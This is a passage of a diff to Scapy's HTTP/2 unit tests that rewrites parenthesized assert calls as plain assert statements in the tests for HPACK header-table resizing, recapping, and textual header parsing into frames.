h2.HPackLitHdrFldWithIncrIndexing( hdr_value=h2.HPackHdrString(data=h2.HPackZString(hdrv)) ) tbl.register(hdr) -assert(len(tbl) <= 80) -assert(tbl[h2.HPackHdrTable._static_entries_last_idx+1].value() == hdrv) +assert len(tbl) <= 80 +assert tbl[h2.HPackHdrTable._static_entries_last_idx+1].value() == hdrv hdrv2 = 'JSESSID=abcdef0123456789' hdr2 = h2.HPackLitHdrFldWithIncrIndexing( @@ -1541,15 +1541,15 @@ hdr2 = h2.HPackLitHdrFldWithIncrIndexing( hdr_value=h2.HPackHdrString(data=h2.HPackZString(hdrv2)) ) tbl.register(hdr2) -assert(len(tbl) <= 80) -assert(tbl[h2.HPackHdrTable._static_entries_last_idx+1].value() == hdrv2) +assert len(tbl) <= 80 +assert tbl[h2.HPackHdrTable._static_entries_last_idx+1].value() == hdrv2 try: tbl[h2.HPackHdrTable._static_entries_last_idx+2] ret = False except Exception: ret = True -assert(ret) +assert ret = HTTP/2 HPackHdrTable : Resizing @@ -1562,7 +1562,7 @@ hdr = h2.HPackLitHdrFldWithIncrIndexing( hdr_value=h2.HPackHdrString(data=h2.HPackZString(hdrv)) ) tbl.register(hdr) -assert(tbl[h2.HPackHdrTable._static_entries_last_idx+1].value() == hdrv) +assert tbl[h2.HPackHdrTable._static_entries_last_idx+1].value() == hdrv hdrv2 = 'JSESSID=abcdef0123456789' hdr2 = h2.HPackLitHdrFldWithIncrIndexing( @@ -1570,8 +1570,8 @@ hdr2 = h2.HPackLitHdrFldWithIncrIndexing( hdr_value=h2.HPackHdrString(data=h2.HPackZString(hdrv2)) ) tbl.register(hdr2) -assert(tbl[h2.HPackHdrTable._static_entries_last_idx+1].value() == hdrv2) -assert(tbl[h2.HPackHdrTable._static_entries_last_idx+2].value() == hdrv) +assert tbl[h2.HPackHdrTable._static_entries_last_idx+1].value() == hdrv2 +assert tbl[h2.HPackHdrTable._static_entries_last_idx+2].value() == hdrv #Resizing to a value higher than cap (default:4096) try: @@ -1580,25 +1580,25 @@ try: except AssertionError: ret = True -assert(ret) +assert ret #Resizing to a lower value by that is not small enough to cause eviction tbl.resize(1024) -assert(tbl[h2.HPackHdrTable._static_entries_last_idx+1].value() == hdrv2) -assert(tbl[h2.HPackHdrTable._static_entries_last_idx+2].value() == hdrv) +assert tbl[h2.HPackHdrTable._static_entries_last_idx+1].value() == hdrv2 +assert tbl[h2.HPackHdrTable._static_entries_last_idx+2].value() == hdrv #Resizing to a higher value but thatt is lower than cap tbl.resize(2048) -assert(tbl[h2.HPackHdrTable._static_entries_last_idx+1].value() == hdrv2) -assert(tbl[h2.HPackHdrTable._static_entries_last_idx+2].value() == hdrv) +assert tbl[h2.HPackHdrTable._static_entries_last_idx+1].value() == hdrv2 +assert tbl[h2.HPackHdrTable._static_entries_last_idx+2].value() == hdrv #Resizing to a lower value that causes eviction tbl.resize(80) -assert(tbl[h2.HPackHdrTable._static_entries_last_idx+1].value() == hdrv2) +assert tbl[h2.HPackHdrTable._static_entries_last_idx+1].value() == hdrv2 try: tbl[h2.HPackHdrTable._static_entries_last_idx+2] ret = False except Exception: ret = True -assert(ret) +assert ret = HTTP/2 HPackHdrTable : Recapping ~ http2 hpack hpackhdrtable @@ -1610,7 +1610,7 @@ hdr = h2.HPackLitHdrFldWithIncrIndexing( hdr_value=h2.HPackHdrString(data=h2.HPackZString(hdrv)) ) tbl.register(hdr) -assert(tbl[h2.HPackHdrTable._static_entries_last_idx+1].value() == hdrv) +assert tbl[h2.HPackHdrTable._static_entries_last_idx+1].value() == hdrv hdrv2 = 'JSESSID=abcdef0123456789' hdr2 = h2.HPackLitHdrFldWithIncrIndexing( @@ -1618,29 +1618,29 @@ hdr2 = h2.HPackLitHdrFldWithIncrIndexing( hdr_value=h2.HPackHdrString(data=h2.HPackZString(hdrv2)) ) tbl.register(hdr2) -assert(tbl[h2.HPackHdrTable._static_entries_last_idx+1].value() == hdrv2) -assert(tbl[h2.HPackHdrTable._static_entries_last_idx+2].value() == hdrv) +assert tbl[h2.HPackHdrTable._static_entries_last_idx+1].value() == hdrv2 +assert tbl[h2.HPackHdrTable._static_entries_last_idx+2].value() == hdrv #Recapping to a higher value tbl.recap(8192) -assert(tbl[h2.HPackHdrTable._static_entries_last_idx+1].value() == hdrv2) -assert(tbl[h2.HPackHdrTable._static_entries_last_idx+2].value() == hdrv) +assert tbl[h2.HPackHdrTable._static_entries_last_idx+1].value() == hdrv2 +assert tbl[h2.HPackHdrTable._static_entries_last_idx+2].value() == hdrv #Recapping to a low value but without causing eviction tbl.recap(1024) -assert(tbl[h2.HPackHdrTable._static_entries_last_idx+1].value() == hdrv2) -assert(tbl[h2.HPackHdrTable._static_entries_last_idx+2].value() == hdrv) +assert tbl[h2.HPackHdrTable._static_entries_last_idx+1].value() == hdrv2 +assert tbl[h2.HPackHdrTable._static_entries_last_idx+2].value() == hdrv #Recapping to a low value that causes evictiontbl.recap(1024) tbl.recap(80) -assert(tbl[h2.HPackHdrTable._static_entries_last_idx+1].value() == hdrv2) +assert tbl[h2.HPackHdrTable._static_entries_last_idx+1].value() == hdrv2 try: tbl[h2.HPackHdrTable._static_entries_last_idx+2] ret = False except Exception: ret = True -assert(ret) +assert ret = HTTP/2 HPackHdrTable : Generating Textual Representation ~ http2 hpack hpackhdrtable helpers @@ -1678,7 +1678,7 @@ x-generation-date: 2016-08-11 user-agent: Mozilla/5.0 Generated by hand X-Generated-By: Me''' -assert(h.gen_txt_repr(p) == expected_output) +assert h.gen_txt_repr(p) == expected_output = HTTP/2 HPackHdrTable : Parsing Textual Representation ~ http2 hpack hpackhdrtable helpers @@ -1707,87 +1707,87 @@ seq = h.parse_txt_hdrs( should_index=lambda name: name in ['user-agent', 'x-generation-software'], is_sensitive=lambda name, value: name in ['x-generated-by', ':path'] ) -assert(isinstance(seq, h2.H2Seq)) -assert(len(seq.frames) == 2) +assert isinstance(seq, h2.H2Seq) +assert len(seq.frames) == 2 p = seq.frames[0] -assert(isinstance(p, h2.H2Frame)) -assert(p.type == 1) -assert(len(p.flags) == 1) -assert('EH' in p.flags) -assert(p.stream_id == 1) -assert(isinstance(p.payload, h2.H2HeadersFrame)) +assert isinstance(p, h2.H2Frame) +assert p.type == 1 +assert len(p.flags) == 1 +assert 'EH' in p.flags +assert p.stream_id == 1 +assert isinstance(p.payload, h2.H2HeadersFrame) hdrs_frm = p[h2.H2HeadersFrame] -assert(len(p.hdrs) == 9) +assert len(p.hdrs) == 9 hdr = p.hdrs[0] -assert(isinstance(hdr, h2.HPackIndexedHdr)) -assert(hdr.magic == 1) -assert(hdr.index == 3) +assert isinstance(hdr, h2.HPackIndexedHdr) +assert hdr.magic == 1 +assert hdr.index == 3 hdr = p.hdrs[1] -assert(isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing)) -assert(hdr.magic == 0) -assert(hdr.never_index == 1) -assert(hdr.index in [4, 5]) -assert(hdr.hdr_name is None) -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackZString(/login.php)') +assert isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing) +assert hdr.magic == 0 +assert hdr.never_index == 1 +assert hdr.index in [4, 5] +assert hdr.hdr_name is None +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackZString(/login.php)' hdr = p.hdrs[2] -assert(isinstance(hdr, h2.HPackIndexedHdr)) -assert(hdr.magic == 1) -assert(hdr.index == 7) +assert isinstance(hdr, h2.HPackIndexedHdr) +assert hdr.magic == 1 +assert hdr.index == 7 hdr = p.hdrs[3] -assert(isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing)) -assert(hdr.magic == 0) -assert(hdr.never_index == 0) -assert(hdr.index == 31) -assert(hdr.hdr_name is None) -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackZString(application/x-www-form-urlencoded)') +assert isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing) +assert hdr.magic == 0 +assert hdr.never_index == 0 +assert hdr.index == 31 +assert hdr.hdr_name is None +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackZString(application/x-www-form-urlencoded)' hdr = p.hdrs[4] -assert(isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing)) -assert(hdr.magic == 0) -assert(hdr.never_index == 0) -assert(hdr.index == 28) -assert(hdr.hdr_name is None) -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackLiteralString(22)') +assert isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing) +assert hdr.magic == 0 +assert hdr.never_index == 0 +assert hdr.index == 28 +assert hdr.hdr_name is None +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackLiteralString(22)' hdr = p.hdrs[5] -assert(isinstance(hdr, h2.HPackLitHdrFldWithIncrIndexing)) -assert(hdr.magic == 1) -assert(hdr.index == 58) -assert(hdr.hdr_name is None) -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackZString(Mozilla/5.0 Generated by hand)') +assert isinstance(hdr, h2.HPackLitHdrFldWithIncrIndexing) +assert hdr.magic == 1 +assert hdr.index == 58 +assert hdr.hdr_name is None +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackZString(Mozilla/5.0 Generated by hand)' hdr = p.hdrs[6] -assert(isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing)) -assert(hdr.magic == 0) -assert(hdr.never_index == 1) -assert(hdr.index == 0) -assert(isinstance(hdr.hdr_name, h2.HPackHdrString)) -assert(hdr.hdr_name.data == 'HPackZString(x-generated-by)') -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackLiteralString(Me)') +assert isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing) +assert hdr.magic == 0 +assert hdr.never_index == 1 +assert hdr.index == 0 +assert isinstance(hdr.hdr_name, h2.HPackHdrString) +assert hdr.hdr_name.data == 'HPackZString(x-generated-by)' +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackLiteralString(Me)' hdr = p.hdrs[7] -assert(isinstance(hdr, h2.HPackIndexedHdr)) -assert(hdr.magic == 1) -assert(hdr.index == 63) +assert isinstance(hdr, h2.HPackIndexedHdr) +assert hdr.magic == 1 +assert hdr.index == 63 hdr = p.hdrs[8] -assert(isinstance(hdr, h2.HPackLitHdrFldWithIncrIndexing)) -assert(hdr.magic == 1) -assert(hdr.index == 0) -assert(isinstance(hdr.hdr_name, h2.HPackHdrString)) -assert(hdr.hdr_name.data == 'HPackZString(x-generation-software)') -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackZString(scapy)') +assert isinstance(hdr, h2.HPackLitHdrFldWithIncrIndexing) +assert hdr.magic == 1 +assert hdr.index == 0 +assert isinstance(hdr.hdr_name, h2.HPackHdrString) +assert hdr.hdr_name.data == 'HPackZString(x-generation-software)' +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackZString(scapy)' p = seq.frames[1] -assert(isinstance(p, h2.H2Frame)) -assert(p.type == 0) -assert(len(p.flags) == 1) -assert('ES' in p.flags) -assert(p.stream_id == 1) -assert(isinstance(p.payload, h2.H2DataFrame)) +assert isinstance(p, h2.H2Frame) +assert p.type == 0 +assert len(p.flags) == 1 +assert 'ES' in p.flags +assert p.stream_id == 1 +assert isinstance(p.payload, h2.H2DataFrame) pay = p[h2.H2DataFrame] -assert(pay.data == body) +assert pay.data == body = HTTP/2 HPackHdrTable : Parsing Textual Representation without body ~ http2 hpack hpackhdrtable helpers @@ -1808,57 +1808,57 @@ h.register(h2.HPackLitHdrFldWithIncrIndexing( # Without body seq = h.parse_txt_hdrs(hdrs, stream_id=1) -assert(isinstance(seq, h2.H2Seq)) +assert isinstance(seq, h2.H2Seq) #This is the first major difference with the first test -assert(len(seq.frames) == 1) +assert len(seq.frames) == 1 p = seq.frames[0] -assert(isinstance(p, h2.H2Frame)) -assert(p.type == 1) -assert(len(p.flags) == 2) -assert('EH' in p.flags) +assert isinstance(p, h2.H2Frame) +assert p.type == 1 +assert len(p.flags) == 2 +assert 'EH' in p.flags #This is the second major difference with the first test -assert('ES' in p.flags) -assert(p.stream_id == 1) -assert(isinstance(p.payload, h2.H2HeadersFrame)) +assert 'ES' in p.flags +assert p.stream_id == 1 +assert isinstance(p.payload, h2.H2HeadersFrame) hdrs_frm = p[h2.H2HeadersFrame] -assert(len(p.hdrs) == 6) +assert len(p.hdrs) == 6 hdr = p.hdrs[0] -assert(isinstance(hdr, h2.HPackIndexedHdr)) -assert(hdr.magic == 1) -assert(hdr.index == 3) +assert isinstance(hdr, h2.HPackIndexedHdr) +assert hdr.magic == 1 +assert hdr.index == 3 hdr = p.hdrs[1] -assert(isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing)) -assert(hdr.magic == 0) -assert(hdr.never_index == 0) -assert(hdr.index in [4, 5]) -assert(hdr.hdr_name is None) -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackZString(/login.php)') +assert isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing) +assert hdr.magic == 0 +assert hdr.never_index == 0 +assert hdr.index in [4, 5] +assert hdr.hdr_name is None +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackZString(/login.php)' hdr = p.hdrs[2] -assert(isinstance(hdr, h2.HPackIndexedHdr)) -assert(hdr.magic == 1) -assert(hdr.index == 7) +assert isinstance(hdr, h2.HPackIndexedHdr) +assert hdr.magic == 1 +assert hdr.index == 7 hdr = p.hdrs[3] -assert(isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing)) -assert(hdr.magic == 0) -assert(hdr.never_index == 0) -assert(hdr.index == 58) -assert(hdr.hdr_name is None) -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackZString(Mozilla/5.0 Generated by hand)') +assert isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing) +assert hdr.magic == 0 +assert hdr.never_index == 0 +assert hdr.index == 58 +assert hdr.hdr_name is None +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackZString(Mozilla/5.0 Generated by hand)' hdr = p.hdrs[4] -assert(isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing)) -assert(hdr.magic == 0) -assert(hdr.never_index == 0) -assert(hdr.index == 0) -assert(isinstance(hdr.hdr_name, h2.HPackHdrString)) -assert(hdr.hdr_name.data == 'HPackZString(x-generated-by)') -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackLiteralString(Me)') +assert isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing) +assert hdr.magic == 0 +assert hdr.never_index == 0 +assert hdr.index == 0 +assert isinstance(hdr.hdr_name, h2.HPackHdrString) +assert hdr.hdr_name.data == 'HPackZString(x-generated-by)' +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackLiteralString(Me)' hdr = p.hdrs[5] -assert(isinstance(hdr, h2.HPackIndexedHdr)) -assert(hdr.magic == 1) -assert(hdr.index == 62) +assert isinstance(hdr, h2.HPackIndexedHdr) +assert hdr.magic == 1 +assert hdr.index == 62 = HTTP/2 HPackHdrTable : Parsing Textual Representation with too small max frame @@ -1909,80 +1909,80 @@ h.register(h2.HPackLitHdrFldWithIncrIndexing( # Now trying to parse it with a max frame size large enough for x-long-header to # fit in a frame seq = h.parse_txt_hdrs(hdrs, stream_id=1, max_frm_sz=8192) -assert(isinstance(seq, h2.H2Seq)) -assert(len(seq.frames) == 1) +assert isinstance(seq, h2.H2Seq) +assert len(seq.frames) == 1 p = seq.frames[0] -assert(isinstance(p, h2.H2Frame)) -assert(p.type == 1) -assert(len(p.flags) == 2) -assert('EH' in p.flags) -assert('ES' in p.flags) -assert(p.stream_id == 1) -assert(isinstance(p.payload, h2.H2HeadersFrame)) +assert isinstance(p, h2.H2Frame) +assert p.type == 1 +assert len(p.flags) == 2 +assert 'EH' in p.flags +assert 'ES' in p.flags +assert p.stream_id == 1 +assert isinstance(p.payload, h2.H2HeadersFrame) hdrs_frm = p[h2.H2HeadersFrame] -assert(len(p.hdrs) == 9) +assert len(p.hdrs) == 9 hdr = p.hdrs[0] -assert(isinstance(hdr, h2.HPackIndexedHdr)) -assert(hdr.magic == 1) -assert(hdr.index == 3) +assert isinstance(hdr, h2.HPackIndexedHdr) +assert hdr.magic == 1 +assert hdr.index == 3 hdr = p.hdrs[1] -assert(isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing)) -assert(hdr.magic == 0) -assert(hdr.never_index == 0) -assert(hdr.index in [4, 5]) -assert(hdr.hdr_name is None) -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackZString(/login.php)') +assert isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing) +assert hdr.magic == 0 +assert hdr.never_index == 0 +assert hdr.index in [4, 5] +assert hdr.hdr_name is None +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackZString(/login.php)' hdr = p.hdrs[2] -assert(isinstance(hdr, h2.HPackIndexedHdr)) -assert(hdr.magic == 1) -assert(hdr.index == 7) +assert isinstance(hdr, h2.HPackIndexedHdr) +assert hdr.magic == 1 +assert hdr.index == 7 hdr = p.hdrs[3] -assert(isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing)) -assert(hdr.magic == 0) -assert(hdr.never_index == 0) -assert(hdr.index == 31) -assert(hdr.hdr_name is None) -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackZString(application/x-www-form-urlencoded)') +assert isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing) +assert hdr.magic == 0 +assert hdr.never_index == 0 +assert hdr.index == 31 +assert hdr.hdr_name is None +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackZString(application/x-www-form-urlencoded)' hdr = p.hdrs[4] -assert(isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing)) -assert(hdr.magic == 0) -assert(hdr.never_index == 0) -assert(hdr.index == 28) -assert(hdr.hdr_name is None) -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackLiteralString(22)') +assert isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing) +assert hdr.magic == 0 +assert hdr.never_index == 0 +assert hdr.index == 28 +assert hdr.hdr_name is None +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackLiteralString(22)' hdr = p.hdrs[5] -assert(isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing)) -assert(hdr.magic == 0) -assert(hdr.never_index == 0) -assert(hdr.index == 58) -assert(hdr.hdr_name is None) -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackZString(Mozilla/5.0 Generated by hand)') +assert isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing) +assert hdr.magic == 0 +assert hdr.never_index == 0 +assert hdr.index == 58 +assert hdr.hdr_name is None +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackZString(Mozilla/5.0 Generated by hand)' hdr = p.hdrs[6] -assert(isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing)) -assert(hdr.magic == 0) -assert(hdr.never_index == 0) -assert(hdr.index == 0) -assert(isinstance(hdr.hdr_name, h2.HPackHdrString)) -assert(hdr.hdr_name.data == 'HPackZString(x-generated-by)') -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackLiteralString(Me)') +assert isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing) +assert hdr.magic == 0 +assert hdr.never_index == 0 +assert hdr.index == 0 +assert isinstance(hdr.hdr_name, h2.HPackHdrString) +assert hdr.hdr_name.data == 'HPackZString(x-generated-by)' +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackLiteralString(Me)' hdr = p.hdrs[7] -assert(isinstance(hdr, h2.HPackIndexedHdr)) -assert(hdr.magic == 1) -assert(hdr.index == 62) +assert isinstance(hdr, h2.HPackIndexedHdr) +assert hdr.magic == 1 +assert hdr.index == 62 hdr = p.hdrs[8] -assert(isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing)) -assert(hdr.magic == 0) -assert(hdr.never_index == 0) -assert(hdr.index == 0) -assert(isinstance(hdr.hdr_name, h2.HPackHdrString)) -assert(hdr.hdr_name.data == 'HPackZString(x-long-header)') -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackZString({})'.format('a'*5000)) +assert isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing) +assert hdr.magic == 0 +assert hdr.never_index == 0 +assert hdr.index == 0 +assert isinstance(hdr.hdr_name, h2.HPackHdrString) +assert hdr.hdr_name.data == 'HPackZString(x-long-header)' +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackZString({})'.format('a'*5000) = HTTP/2 HPackHdrTable : Parsing Textual Representation with two very large headers and a large authorized frame size ~ http2 hpack hpackhdrtable helpers @@ -2010,97 +2010,97 @@ h.register(h2.HPackLitHdrFldWithIncrIndexing( # fit in a frame but a maximum header fragment size that is not large enough to # store two x-long-header seq = h.parse_txt_hdrs(hdrs, stream_id=1, max_frm_sz=8192) -assert(isinstance(seq, h2.H2Seq)) -assert(len(seq.frames) == 2) +assert isinstance(seq, h2.H2Seq) +assert len(seq.frames) == 2 p = seq.frames[0] -assert(isinstance(p, h2.H2Frame)) -assert(p.type == 1) -assert(len(p.flags) == 1) -assert('ES' in p.flags) -assert(p.stream_id == 1) -assert(isinstance(p.payload, h2.H2HeadersFrame)) +assert isinstance(p, h2.H2Frame) +assert p.type == 1 +assert len(p.flags) == 1 +assert 'ES' in p.flags +assert p.stream_id == 1 +assert isinstance(p.payload, h2.H2HeadersFrame) hdrs_frm = p[h2.H2HeadersFrame] -assert(len(p.hdrs) == 9) +assert len(p.hdrs) == 9 hdr = p.hdrs[0] -assert(isinstance(hdr, h2.HPackIndexedHdr)) -assert(hdr.magic == 1) -assert(hdr.index == 3) +assert isinstance(hdr, h2.HPackIndexedHdr) +assert hdr.magic == 1 +assert hdr.index == 3 hdr = p.hdrs[1] -assert(isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing)) -assert(hdr.magic == 0) -assert(hdr.never_index == 0) -assert(hdr.index in [4, 5]) -assert(hdr.hdr_name is None) -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackZString(/login.php)') +assert isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing) +assert hdr.magic == 0 +assert hdr.never_index == 0 +assert hdr.index in [4, 5] +assert hdr.hdr_name is None +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackZString(/login.php)' hdr = p.hdrs[2] -assert(isinstance(hdr, h2.HPackIndexedHdr)) -assert(hdr.magic == 1) -assert(hdr.index == 7) +assert isinstance(hdr, h2.HPackIndexedHdr) +assert hdr.magic == 1 +assert hdr.index == 7 hdr = p.hdrs[3] -assert(isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing)) -assert(hdr.magic == 0) -assert(hdr.never_index == 0) -assert(hdr.index == 31) -assert(hdr.hdr_name is None) -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackZString(application/x-www-form-urlencoded)') +assert isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing) +assert hdr.magic == 0 +assert hdr.never_index == 0 +assert hdr.index == 31 +assert hdr.hdr_name is None +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackZString(application/x-www-form-urlencoded)' hdr = p.hdrs[4] -assert(isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing)) -assert(hdr.magic == 0) -assert(hdr.never_index == 0) -assert(hdr.index == 28) -assert(hdr.hdr_name is None) -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackLiteralString(22)') +assert isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing) +assert hdr.magic == 0 +assert hdr.never_index == 0 +assert hdr.index == 28 +assert hdr.hdr_name is None +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackLiteralString(22)' hdr = p.hdrs[5] -assert(isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing)) -assert(hdr.magic == 0) -assert(hdr.never_index == 0) -assert(hdr.index == 58) -assert(hdr.hdr_name is None) -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackZString(Mozilla/5.0 Generated by hand)') +assert isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing) +assert hdr.magic == 0 +assert hdr.never_index == 0 +assert hdr.index == 58 +assert hdr.hdr_name is None +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackZString(Mozilla/5.0 Generated by hand)' hdr = p.hdrs[6] -assert(isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing)) -assert(hdr.magic == 0) -assert(hdr.never_index == 0) -assert(hdr.index == 0) -assert(isinstance(hdr.hdr_name, h2.HPackHdrString)) -assert(hdr.hdr_name.data == 'HPackZString(x-generated-by)') -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackLiteralString(Me)') +assert isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing) +assert hdr.magic == 0 +assert hdr.never_index == 0 +assert hdr.index == 0 +assert isinstance(hdr.hdr_name, h2.HPackHdrString) +assert hdr.hdr_name.data == 'HPackZString(x-generated-by)' +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackLiteralString(Me)' hdr = p.hdrs[7] -assert(isinstance(hdr, h2.HPackIndexedHdr)) -assert(hdr.magic == 1) -assert(hdr.index == 62) +assert isinstance(hdr, h2.HPackIndexedHdr) +assert hdr.magic == 1 +assert hdr.index == 62 hdr = p.hdrs[8] -assert(isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing)) -assert(hdr.magic == 0) -assert(hdr.never_index == 0) -assert(hdr.index == 0) -assert(isinstance(hdr.hdr_name, h2.HPackHdrString)) -assert(hdr.hdr_name.data == 'HPackZString(x-long-header)') -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackZString({})'.format('a'*5000)) +assert isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing) +assert hdr.magic == 0 +assert hdr.never_index == 0 +assert hdr.index == 0 +assert isinstance(hdr.hdr_name, h2.HPackHdrString) +assert hdr.hdr_name.data == 'HPackZString(x-long-header)' +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackZString({})'.format('a'*5000) p = seq.frames[1] -assert(isinstance(p, h2.H2Frame)) -assert(p.type == 9) -assert(len(p.flags) == 1) -assert('EH' in p.flags) -assert(p.stream_id == 1) -assert(isinstance(p.payload, h2.H2ContinuationFrame)) +assert isinstance(p, h2.H2Frame) +assert p.type == 9 +assert len(p.flags) == 1 +assert 'EH' in p.flags +assert p.stream_id == 1 +assert isinstance(p.payload, h2.H2ContinuationFrame) hdrs_frm = p[h2.H2ContinuationFrame] -assert(len(p.hdrs) == 1) +assert len(p.hdrs) == 1 hdr = p.hdrs[0] -assert(isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing)) -assert(hdr.magic == 0) -assert(hdr.never_index == 0) -assert(hdr.index == 0) -assert(isinstance(hdr.hdr_name, h2.HPackHdrString)) -assert(hdr.hdr_name.data == 'HPackZString(x-long-header)') -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackZString({})'.format('b'*5000)) +assert isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing) +assert hdr.magic == 0 +assert hdr.never_index == 0 +assert hdr.index == 0 +assert isinstance(hdr.hdr_name, h2.HPackHdrString) +assert hdr.hdr_name.data == 'HPackZString(x-long-header)' +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackZString({})'.format('b'*5000) = HTTP/2 HPackHdrTable : Parsing Textual Representation with two very large headers, a large authorized frame size and a "small" max header list size ~ http2 hpack hpackhdrtable helpers @@ -2128,105 +2128,105 @@ h.register(h2.HPackLitHdrFldWithIncrIndexing( # fit in a frame but and a max header list size that is large enough to fit one # but not two seq = h.parse_txt_hdrs(hdrs, stream_id=1, max_frm_sz=8192, max_hdr_lst_sz=5050) -assert(isinstance(seq, h2.H2Seq)) -assert(len(seq.frames) == 3) +assert isinstance(seq, h2.H2Seq) +assert len(seq.frames) == 3 p = seq.frames[0] -assert(isinstance(p, h2.H2Frame)) -assert(p.type == 1) -assert(len(p.flags) == 1) -assert('ES' in p.flags) -assert(p.stream_id == 1) -assert(isinstance(p.payload, h2.H2HeadersFrame)) +assert isinstance(p, h2.H2Frame) +assert p.type == 1 +assert len(p.flags) == 1 +assert 'ES' in p.flags +assert p.stream_id == 1 +assert isinstance(p.payload, 